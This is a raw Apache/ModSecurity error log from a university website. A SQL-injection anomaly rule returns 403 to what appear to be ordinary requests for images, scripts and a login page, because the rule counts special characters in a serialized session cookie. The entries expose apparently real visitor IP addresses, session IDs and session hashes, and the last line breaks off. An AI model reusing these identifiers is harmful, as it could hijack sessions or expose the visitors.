[Mon Aug 28 23:57:38.176451 2023] [:error] [pid 55916] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOzSAsCo-f0AANpsPIQAAAAf"]
[Mon Aug 28 23:57:38.185509 2023] [:error] [pid 55903] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOzSAsCo-f0AANpfcYkAAAAF"]
[Mon Aug 28 23:57:38.192562 2023] [:error] [pid 55912] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOzSAsCo-f0AANpo-8AAAAAb"]
[Mon Aug 28 23:57:38.406512 2023] [:error] [pid 55910] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOzSAsCo-f0AANpm5qgAAAAX"]
[Mon Aug 28 23:57:38.411809 2023] [:error] [pid 55749] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOzSAsCo-f0AANnF9bIAAAAE"]
[Mon Aug 28 23:57:38.428487 2023] [:error] [pid 55794] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOzSAsCo-f0AANny2WQAAAAO"]
[Mon Aug 28 23:57:38.430308 2023] [:error] [pid 55916] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOzSAsCo-f0AANpsPIUAAAAf"]
[Mon Aug 28 23:57:38.447160 2023] [:error] [pid 55903] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOzSAsCo-f0AANpfcYoAAAAF"]
[Mon Aug 28 23:57:38.455690 2023] [:error] [pid 55912] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOzSAsCo-f0AANpo-8EAAAAb"]
[Mon Aug 28 23:57:38.654680 2023] [:error] [pid 55910] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOzSAsCo-f0AANpm5qkAAAAX"]
[Mon Aug 28 23:57:38.662744 2023] [:error] [pid 55749] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOzSAsCo-f0AANnF9bMAAAAE"]
[Mon Aug 28 23:57:38.681324 2023] [:error] [pid 55794] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOzSAsCo-f0AANny2WUAAAAO"]
[Mon Aug 28 23:57:38.684508 2023] [:error] [pid 55916] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOzSAsCo-f0AANpsPIYAAAAf"]
[Mon Aug 28 23:57:38.708756 2023] [:error] [pid 55903] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOzSAsCo-f0AANpfcYsAAAAF"]
[Mon Aug 28 23:57:38.718379 2023] [:error] [pid 55912] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOzSAsCo-f0AANpo-8IAAAAb"]
[Mon Aug 28 23:57:38.902521 2023] [:error] [pid 55910] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOzSAsCo-f0AANpm5qoAAAAX"]
[Mon Aug 28 23:57:39.159175 2023] [:error] [pid 55914] [client 140.213.43.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x225f2d6daff9fffae752b8f1ad6f33427e\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22140.213.43.86\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; RMX1821) AppleWebK\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241847\\x22;}eac9832f2b8c5ca2c034cb3667207fb6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOzSA8Co-f0AANpqFygAAAAd"]
[Mon Aug 28 23:57:39.554324 2023] [:error] [pid 55914] [client 140.213.43.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x225f2d6daff9fffae752b8f1ad6f33427e\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22140.213.43.86\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; RMX1821) AppleWebK\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241847\\x22;}eac9832f2b8c5ca2c034cb3667207fb6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzSA8Co-f0AANpqFykAAAAd"]
[Mon Aug 28 23:57:44.406655 2023] [:error] [pid 55914] [client 140.213.43.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x225f2d6daff9fffae752b8f1ad6f33427e\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22140.213.43.86\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; RMX1821) AppleWebK\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241847\\x22;}eac9832f2b8c5ca2c034cb3667207fb6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOzSCMCo-f0AANpqFyoAAAAd"]
[Mon Aug 28 23:57:44.545710 2023] [:error] [pid 55914] [client 140.213.43.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: 